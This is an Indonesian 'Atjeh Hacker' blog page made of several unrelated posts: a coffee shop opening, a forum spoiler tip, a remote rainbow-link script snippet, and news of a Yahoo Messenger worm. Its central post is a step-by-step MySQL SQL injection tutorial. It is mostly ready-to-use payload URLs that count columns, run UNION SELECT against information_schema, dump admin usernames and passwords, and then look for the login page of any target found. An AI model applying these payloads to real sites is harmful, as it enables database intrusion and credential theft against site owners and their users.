Loading

Ahmad Felik Buka Atjeh Kupi di Pekanbaru

Ahmad Felik Buka Atjeh Kupi di Pekanbaru Pekanbaru (detakriau.com) - Ahmad Felik pengusaha dan pemilik Atjeh Kupi adalah sosok orang pengusaha asal Aceh yang mengklaim memperkenalkan cita rasa kopi trubus Aceh pertama di Pekanbaru "kita menyediakan beberapa macam kupi yang disediakan untuk para pengemar minum kopi, selain itu berapa menu makanan khas dari provinsi Aceh yang akan kita kenalkan kepada masyarakat Pekanbaru, seperti Mie Aceh. Saya melihat usaha kuliner cukup prospek di Pekanbaru ini, makanya saya beranikan diri membuka usaha ini", terang Ahmad Felik kepada detakriau.com di lokasi peresmian kedai Kopi Aceh yang tengah dibykanya. Ahmad Felik, sang pemilik usaha ini juga berharap dengan keberadaan kedai Atjeh Kupi ini diharapkan bisa lebih memperat tali persaudaraannya terhadap masyarakat Aceh yang telah bermukim di Kota Pekanbaru ini. Sedangkan kedai kopi khas Aceh yang dibukanya tersebut berada di jalan Paus Ujung 10, kira-kira seratus meter dari simpang jalan Arifin Ahmad Pekanbaru (agung)

Cara membuat spoiler di forum

Di artikel ini, saya ingin memberikan cara membuat spoiler di forum
Mungkin sebagian besar sudah mengetahui caranya , namun ada sebagian orang juga yang belum mengetahui caranya sehingga saya hadir di sini untuk sharing cara spoiler tersebut.

Simple saja caranya,

cukup ketikkan :
[spoiler=Atjeh-Hacker] blablabla[/spoiler]

Keterangan : Tentu saja kata '
blablabla' diganti sesuai dengan kata atau foto yang mau dimasukkan ke dalam spoiler. Dan kata 'Atjeh-Hacker' adalah kata yang akan muncul pada kata 'spoiler formasukin Gambar /isi yg mau ditampilkan'

My SQL Injection Step by Step


Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .
======================================
Author : Gonzhack | Indonesian Coder
Posted : MISTERFRIBO | Indonesian Coder & Hacker Team
http://indonesianhacker.org | http://indonesiancoder.com | http://jatimcrew.com | http://arumbia.com | http://fribo.tv | http://hacker-newbie.org/

Membuat Link Warna-warni (Pelangi)

link yang berupa teks sangat banyak di blog anda yang berguna untuk navigasi ke halaman lainya misalnya Link Bloggroll, Link Judul Posting, Link Label dan lainya. Nah teks yang terinfeksi Link jika kita letakkan pointer didaerah link tersebut maka warna teks akan berubah sesuai warna yang telah anda atur.
Nah apa jadinya jika link di blog anda memiliki macam-macam warna yang bisa berubah-ubah... wuihhh makin cool aja tuh blog anda, seperi di blog ATJEH HACKER ini jika anda meletakkan pointer di teks Yang terinfeksi maka warnanya akan berubah-ubah.
gimana tertarik gak...? jika iya lihat caranya dibawah



1.Cari Kode <head>

2.kemudian taruh kode dibawah tepat dibawah kode <head>

<script src='http://anas.ku93.googlepages.com/rainbow.js'>
</script>

3.Kurang lebih jadinya
<head>
<script src='http://anas.ku93.googlepages.com/rainbow.js'>
</script>


4.Semudian Save dan Lihat hasilnya ok!

Worm Terbaru Serang Yahoo Messenger


Worm baru serang Yahoo Messenger. Worm tersebut menyerang khususnya untuk computer yang bersistem Windows, dengan sebuah pesan dan kata kunci berupa “Photo” atau “Photos”, juga satu icon dengan smile emoticon, plus link ke situs yang menyerupai Facebook, MySpace, atau situs jejaring social lainnya. Worm tersebut menipu pengguna Yahoo Messenger dengan membujuk user untuk men-download foto dari teman, namun ternyata mengandung malware di dalamnya.

File foto yang telah di-download akan segera masuk ke semua kontak di YM. Worm akan menduplikasi dirinya ke %WinDir%infocard.exe, lalu ke list Windows Firewall, memodifikasi registry keys, dan mematikan Windows Update. Symantec mendeteksi malware tersebut dan memberi nama W32.Yimfoca, yang bisa terjadi di system Windows 98, Windows 95, Windows XP, Windows ME, Windows Vista, Windows NT, Windows Server 2003 dan Windows 2000.

Sementara itu, dari pihak Yahoo kini sedang bekerja untuk mengatasinya. Mereka merekomendasikan kepada pengguna Yahoo Messener, ketika menerima pesan instant yang mencurigakan, dimana di dalamnya mengandung link dari teman, maka harus dipastikan lebih dulu bahwa pesan itu legal, sebelum file di-download dari Yahoo Messenger.

Pengikut

Random Post

Iklan

adefa
widget

Select Your Language

English French German Spain Italian Dutch

Russian Portuguese Japanese Korean Arabic Chinese Simplified
Dapatkan newsletter/postingan terbaru dari Atjeh Hacker langsung dikirimkan ke email anda!!
GRATIS!! GRATIS!!

Enter your email address:

Delivered by FeedBurner

Categories

Buku Tamu

Popular Posts

Favicon1
free counters